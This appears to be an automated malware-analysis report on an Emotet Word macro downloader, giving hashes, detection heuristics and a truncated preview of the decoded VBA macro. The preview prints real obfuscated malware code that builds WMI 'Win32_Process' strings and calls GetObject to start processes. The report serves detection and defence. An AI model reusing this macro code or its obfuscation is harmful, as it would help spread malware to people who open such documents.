Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d4aa6aefb1d37234…

Verdict: MALICIOUS

File type: Office (OLE)
Size: 193.9 KB
Created: 2019-02-22 13:45:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18

MD5: 44a94a7f93dd1aef9aa5b909c9442c37
SHA-1: 35c58979f69359c8f1b8dbad8d417536d201e43e
SHA-256: d4aa6aefb1d37234a4e549827bfe07b56307f6d5d8338b7e9db82f960cb7e1d2

Risk score: 222

Malware Insights

Family: Emotet (confidence 95%)

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV (signature Doc.Downloader.Emotet-6865929-0), indicating it is likely part of the Emotet botnet. High-severity heuristics confirm the presence of an AutoOpen VBA macro that calls GetObject, a common technique for executing downloaded payloads. The macro itself is heavily obfuscated, but its presence together with the associated heuristics strongly suggests it functions as a downloader.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6865929-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6865929-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45725 bytes
SHA-256: 672bcda4744b52134b33701ae10b2cfe06fb4c4f5c4a3345daabfe1a0e0cc597

Script preview: first 1,000 lines of the extracted script
Attribute VB_Name = "I2_8_5_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "u0_48_06"
Function N3_565_()
   Select Case b863__
         Case 431371279
V9_8_06 = (Q_96_7_ * Fix(695364989 / CBool(p_9042))) - W__36__ / Oct(382656033) / 780021985 + CStr(m092_0_8) - 113772300 + ChrB(Y59289__)
End Select
   Select Case z71_6097
         Case 669341825
J5914_ = (w52529_3 * Fix(176847092 / CBool(d4351345))) - i38_0_ / Oct(188194310) / 239570012 + CStr(z5269_3_) - 362754786 + ChrB(X6__1__)
End Select
   Select Case G__377_8
         Case 121105805
v_5621 = (c7____3 * Fix(824173582 / CBool(r_60_50))) - G_51633 / Oct(232067655) / 498670588 + CStr(z6_668) - 327112891 + ChrB(T59__5)
End Select
   Select Case f5__8_6
         Case 642986296
j_81490 = (v8333__7 * Fix(556817151 / CBool(z7928_))) - D5_51528 / Oct(45697134) / 74204509 + CStr(d4___6) - 138267955 + ChrB(f6___8)
End Select
   Select Case R_98_1
         Case 42792980
Y_064_66 = (j5_5_443 * Fix(367194489 / CBool(c___6_4))) - X23530 / Oct(29872258) / 695302326 + CStr(l0538_68) - 748963951 + ChrB(s096_1_)
End Select
   Select Case m96319
         Case 436332751
S7_6_22 = (q019398 * Fix(647319227 / CBool(Z01__2))) - t_49_1 / Oct(281085154) / 399938037 + CStr(z_86__3) - 194116409 + ChrB(W_0656)
End Select
   Select Case w_6___2
         Case 162669992
p66__3 = (v9_2__ * Fix(39925566 / CBool(B5_45_))) - G2__4289 / Oct(404211611) / 188272198 + CStr(Q_6616) - 911824840 + ChrB(D6___2_6)
End Select
   Select Case k4044_5
         Case 138753808
s60_037 = (v__6_4 * Fix(13603534 / CBool(w01970__))) - V941_5 / Oct(171727410) / 920107485 + CStr(z13_81) - 778154580 + ChrB(w_425405)
End Select
End Function
Function A757807_(d600__, p_62990_)
On Error Resume Next
   Select Case q______
         Case 293156284
I7_1606 = (G84593 * Fix(254758058 / CBool(r2__794))) - W610084_ / Oct(905500414) / 148892734 + CStr(b08_1_8) - 617363153 + ChrB(i167193)
End Select
   Select Case J33303
         Case 450992557
Q919__8 = (r0_734_2 * Fix(912080825 / CBool(T3086877))) - j10142 / Oct(400426436) / 523397957 + CStr(X__496_) - 961862349 + ChrB(d4_3_2)
End Select
   Select Case n9847_
         Case 573864838
n806_284 = (w5_5__77 * Fix(790184506 / CBool(J20_6851))) - o20577_ / Oct(215529556) / 666706755 + CStr(q2_1_496) - 989427722 + ChrB(w_97_978)
End Select
f12_6_ = Z334_7 + "winmgmts:Win32" + O2_161_ + "_ProcessStartup" + N_042_3
   Select Case T__2___
         Case 514677828
j23___ = (I5_327 * Fix(811811049 / CBool(o38883_2))) - F776846_ / Oct(240581321) / 428907187 + CStr(P4439649) - 383418898 + ChrB(v16891)
End Select
   Select Case w9__52
         Case 530342176
t942__ = (d__68672 * Fix(15976114 / CBool(i774__))) - R_6530 / Oct(176904541) / 47390928 + CStr(D_3_8__) - 475112187 + ChrB(L505749)
End Select
   Select Case u___047
         Case 842586388
j45706 = (C_1_4__ * Fix(246513483 / CBool(z_0_6_92))) - D2012__ / Oct(353346520) / 368221823 + CStr(h627762) - 571966315 + ChrB(V28_460_)
End Select
U996553_ = O2_06_3 + "winmgmts:Win32" + k5529__2 + "_Process" + m87402_3
   Select Case Y48__1__
         Case 703101196
a_5148 = (w54_29 * Fix(361334800 / CBool(b_2_8128))) - N30_71_ / Oct(877285188) / 864355579 + CStr(i_33594) - 380435095 + ChrB(f7_7_2)
End Select
   Select Case O013623_
         Case 13408787
W_53329 = (d57771 * Fix(550108056 / CBool(h978263))) - D_5075__ / Oct(827837634) / 986804500 + CStr(i85_3_) - 210736181 + ChrB(S8_965__)
End Select
   Select Case Z26__14_
         Case 776571958
Z379_724 = (Q_4296__ * Fix(706111859 / CBool(f3953_))) - u65_1__7 / Oct(94193393) / 554993537 + CStr(d12333) - 751127162 + ChrB(S114__1)
End Select
Set v_31__6 = GetObject(L7_13257 + f12_6_ + N0757_3_)
   Select Case I8780_8
         Case 597217472
B9_3_0_ = (I8_3_1_9 * Fix(975848075 / CBool(D__8419))) - N10500 / O
... (truncated)